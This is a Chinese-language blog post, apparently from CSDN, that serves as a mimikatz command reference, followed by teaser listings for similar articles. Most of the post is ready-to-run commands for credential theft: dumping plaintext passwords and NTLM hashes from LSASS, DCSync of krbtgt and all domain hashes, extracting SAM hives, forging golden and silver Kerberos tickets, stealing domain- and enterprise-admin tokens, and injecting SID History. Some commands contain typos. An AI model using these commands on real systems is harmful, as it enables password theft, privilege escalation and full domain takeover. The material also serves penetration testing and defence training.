mimikatz使用

最新推荐文章于 2025-03-17 20:00:16 发布
最新推荐文章于 2025-03-17 20:00:16 发布
阅读量583 收藏 4
点赞数
分类专栏: 域安全 文章标签: 安全漏洞 信息安全 系统安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/129116428
版权
mimikatz简介
mimikatz可以从机器内存中提取/明文密码/密码Hash/PIN码/Kerberos票据/等。
mimikatz模块介绍
crypto					加密模块
sekurlsa				SekurLSA模块,用来枚举凭据
kerberos				Kerberos包模块
ngc						密码学模块
privilege				提权
process					进程模块
service					服务模块
lsadump					LsaDump模块
ts						终端服务器模块
event					事件模块
misc					杂项模块
token					令牌操作模块
vault					Windows凭据模块
minesweeper				MinSweeper模块
dpapi					DPAPI模块(通过API或RAW访问,数据保护应用程序编程接口)
busylight				BusyLigh模块
sysenv					系统环境值模块
sid						安全标识符模块
iis						IIS XML 配置模块
rpc						RPC控制
sr98					SR98设备和T5577目标模块
rdm						RDM(830AL)设备的射频模块
acr						ACR模块
常见模块的有privilege/sekurlsa/kerberos/lsadump/token/sid
privilege模块
该模块主要用于提权需要管理员身份员运行才可进行提权。
privilege::debug
sekurlsa模块
主要用于枚举凭据的命令,需要高权限运行所以需要显示privilege模块提权。+
抓取内存中保存用户明文密码
sekurlsa::wdigest
抓取内存中保存的用户Hash
sekurlsa::msv
抓取内存中保存用户密码的Key值
sekurlsa::ekeys
抓取内存中保存的用户所有凭据
sekurlsa::logonpasswords
加载dump文件并导出其中的明文密码
sekurlsa::minidump lsass.dump
sekurlsa::logonpasswords full
导出lsass.exe进程中所有的票据
sekurlsa::tickets /export
kerberos模块
查看内存中的Kerberos TGT
kerberos::tgt
查看内存中所有的Kerberos票据
kerberos::list
清除票据
kerberos::purge
将票据注入到内存中
kerberos::ptt xx.kirbi
黄金票据传递攻击
kerberos::golden /user:要伪造的域用户 /domain:域名 /sid:域的sid值 /krbtgt:krbtgt的hash或是AES Key /ptt
白银票据传递攻击
kerberos::golden /user:要伪造的用户 /domain:域名 /sid:域的sid值 /target:服务机器 /service:指定服务,如cifs/ldap /rc4:服务账号的Hash /ptt
lsadump模块
该模块是对Local Security Authority(LSA)进行密码抓取的模块。
通过DCSync导出指定用户密码Hash格式化输出
lsadump::dcsync /domain:test.com /user:krbtgt /csv
通过DCsync导出指定用户的密码Hash的详细信息
lsadump::dcsync /domain:test.com /user:krbtgt 
通过DCsync导出所有用户的Hash
lsadump::dcsync /domain:test.com /all /csv
读取所有用户的Hash,需要域控上以管理员权限运行
lsadump::lsa /pathch
从sam.hive和system.hive文件中获得NTLM Hash
reg save hklm\sam sam.hive
reg save hklm\system system.hive
lsadump::sam /sam:sam.hive /system:system.hive
从本地SAM文件中读取密码Hash
token::elevate
lsadump::sam
token模块
该模块是访问令牌相关的模块
列出当前进程的token信息
token::whoami
token::whoami /full
列出当前系统中存在的token,高权限列出的token最全
token::list
窃取指定的token id的token
token::elevate id 
窃取System权限的token(默认)
token::elevate /system
窃取域管理员的token
token::elevate /domain
窃取企业管理员的token
token::elevate /enterpriseadmin
窃取本地管理员的token
token::elevate /admin
窃取Local Service权限的token
token::elevate /localservice
窃取Network Service权限的token
token::elevate /networkservice
恢复之前的token
token::revert
sid模块
该模块是SID相关的模块
查询指定对象的SID
sid::lookup /name:test

在这里插入图片描述

查询指定SID对应的对象
sid::lookup /sid:S-1-5-21-2691333271-3572924591-1293602303

在这里插入图片描述

通过samAccountName属性查询对象的信息
sid::query /sam:test
通过SID属性查询对象的信息
sid::query /sid:S-1-5-21-2691333271-3572924591-1293602303
通过 samAccountName 属性修改对象的 SID
sid::patch
sid::modify /sam:test /new:S-1-5-21-2691333271-3572924591-1293602303
通过sid属性修改对象的 SID
sid::patch
sid::modify /sid:S-1-5-21-2691333271-3572924591-1293602303 /newsid::patch:S-1-5-21-2691333271-3572924591-1293602304
通过 samAccountName 属性给对象添加一个SID History属性
sid::patch
sid::add /sam;test /new:S-1-5-21-2691333271-3572924591-1293602303
通过sid属性给对象添加一个SID History属性
sid::patch
sid::add /sid:S-1-5-21-2691333271-3572924591-1293602303 /new:S-1-5-21-2691333271-3572924591-1293602303-500
将administrator的SID 添加到 test的SID History 属性中
sid::path
sid::add /sam:test /new:administrator
清除指定samAccountName对象的SID Historty属性
sid::clear /sam::test
清除指定sid对象SID History属性
sid::clear /sid:S-1-5-21-2691333271-3572924591-1293602303
技术分享 | mimikatz的常见使用方法
Uguardsec的博客
08-10 3437
0x00简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就
mimikatz使用方法
课嗨教育的专栏
04-23 3966
0x00 简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe进程中获取当前登录系统用户名的密码, lsass 是微软 Windows 系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass 内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对 lsass 逆算获取.
mimikatz使用
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-15 3万+
mimikatz的下载地址 , 提取码是 kcuh mimikatz是个好东西,它的功能很多,最重要的是能获取windows的账号及明文密码 使用方法: 1:远程连接使用 控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 这里抓到了administrator的账号,密码是null,说明没设密码 注意: 1、 文件夹里有两个版本,一个是对应32位系统的,一个是64位系
内网渗透工具(Mimikatz
最新发布
尘玥的故事
03-17 866
能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,Mimikatz使用通常需要管理员权限,因为它需要访问系统的核心进程和内存。注意:当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码。
mimikatz使用详解
qq_59468567的博客
04-12 1023
该模块是用于提权的模块,很多模块需要高权限运行,所以要先进行提权,只能用具有管理员权限的命令行窗口才可以执行成功,普通用户使用提权命令会失败。其中常用的是privilege、sekurlsa、kerberos、lsadump、token、sid模块。改模块是对Local Security Authiruty(LSA)进行密码抓取的模块。使用该模块需要高权限,因此需要执行提权命令,如下是常用命令。该模块是与Kerberos相关的模块。• privilege 提权模块。• kerberos包模块。
mimikatz的基本使用
a3320315的博客
05-25 1万+
常见命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称--
[后渗透]Mimikatz使用大全1
08-03
【后渗透技术】Mimikatz使用详解 Mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于系统权限提升、密码获取和安全审计。它以其强大的功能在网络安全领域广受欢迎,特别是在渗透测试和红队操作...
Mimikatz使用
qq_46804551的博客
04-04 915
简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就是说只要
mimikatz使用以及源码动态分析
weixin_46956745的博客
05-08 3309
mimikatz使用以及源码分析 文章目录mimikatz使用以及源码分析前言一、mimikatz安装运行二、mimikatz源码分析1.函数具体功能2.函数源码分析(动态)总结 前言 Mimikatz 是法国人 Gentil Kiwi 编写的一款 windows 平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取 windows 处于 active 状态账号的明文密码。mimikatz 的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz
windows内存密码获取mimikatz_trunk
04-17
第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20180325
纯Python中的Mimikatz实现-Python开发
05-25
pypykatz在纯Python中的Mimikatz实现。 至少有一部分:)在所有支持python> = 3.6 WIKI的操作系统上运行。从版本0.1.1开始,命令行有所更改。 不用担心,我在纯Python中有一个很棒的WIKI fo pypykatz Mimikatz实现。 至少有一部分:)在所有支持python> = 3.6 WIKI的操作系统上运行。从版本0.1.1开始,命令行有所更改。 不用担心,我有一个很棒的维基百科。 安装通过pip或从github克隆来安装它。 安装程序将在python的Script目录中创建pypykatz可执行文件。 您可以从那里运行它,应该在您的PATH中。 保重,因为我要打公关,所以github主版本可能会失败
mimikatz.exe
09-28
获取windows密码
mimikatz工具
03-08
本工具可以提取存于windows电脑内存中的密码,安全无毒,最新版工具.
Python-pypykatz是Mimikatz的纯Python实现
08-10
pypykatz:是Mimikatz的纯Python实现
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 8万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
内网渗透工具mimikatz使用
qq_64787896的博客
03-24 1531
在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等 lsadump::dcsync /domain:kevin.com /user:root (在域控上执行)读取所有域用户的哈希 lsadump::lsa /patch 从sam.hive和system.hive文件中获得NTLM Hash lsadump::sam /sam:sam.hive /system:system.hive 从本地SAM文件中读取密码哈希 token::elevate lsadump::sam。
内网渗透神器(Mimikatz)——使用教程,你会的还只有初级工程师的技术吗
2401_84446919的博客
04-18 1631
在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等。从sam.hive和system.hive文件中获得NTLM Hash。sr98: 用于SR98设备和T5577目标的RF模块。rdm: RDM(830AL)器件的射频模块。rpc: mimikatz的RPC控制。导出lsass.exe进程中所有的票据。(在域控上执行)读取所有域用户的哈希。acr: ACR模块。开启Wdigest Auth。关闭Wdigest Auth。
kali mimikatz使用教程
02-28
### Kali Linux 上 Mimikatz使用教程 #### 安装与准备 Kali Linux 是基于 Debian 的操作系统,因此可以利用 `apt` 软件包管理器来安装所需的工具。对于 Mimikatz,在较新的版本中,其功能已经被集成到了 Kiwi ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值